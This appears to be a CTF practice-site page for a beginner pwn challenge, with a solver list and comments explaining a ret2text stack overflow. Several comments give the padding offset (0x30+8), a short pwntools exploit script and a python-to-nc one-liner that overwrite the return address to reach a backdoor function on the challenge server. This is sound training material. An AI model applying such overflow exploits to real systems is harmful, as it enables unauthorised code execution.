评分(1)
解题动态
llan 攻破了该题 9小时前
13500586839 攻破了该题 13小时前
小帽子ctf123 攻破了该题 1天前
学习小能手 攻破了该题 2天前
Tangent0712 攻破了该题 2天前
senrolusr 攻破了该题 2天前
mads 攻破了该题 4天前
ctfJJ 攻破了该题 4天前
wmm. 攻破了该题 4天前
wo.0 攻破了该题 5天前
Chtchen 攻破了该题 5天前
请叫我努力学习 攻破了该题 6天前
小寜 攻破了该题 6天前
Hackerchen 攻破了该题 6天前
nanaqilin 攻破了该题 6天前
小脸王尖尖 攻破了该题 7天前
Erec 攻破了该题 7天前
沧颜 攻破了该题 8天前
至臻猫猫教 攻破了该题 8天前
评论
nirvana。 16天前
举报
在虚拟机中下好文件后,用终端打开下载目录,用unzip file.zip解压文件,ls查看文件,发现解压得到文件名为pwn2,用file pwn2分析,接着用nano exp.py编写Python脚本,最后python3 exp.py执行,得到flag
xtk 2月前
举报
from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了
modeng 3月前
举报
这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502
王安小子 3月前
举报
python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok
乌鸦乌鸦乌鸦乌鸦 8月前
举报
为什么答案是56字节,我测出来是40字节
scust 7月前
举报
看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节
weiyouzhunze 10月前
举报
栈溢出漏洞利用
afag 11月前
举报
0x30+8填充
17773146280 11月前
举报
简单的ret2text题目,后门函数地址加上缓冲区长度就可以了
YellowZy 1年前
举报
应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充
255a 1年前
举报
修改main函数返回地址的rcx的值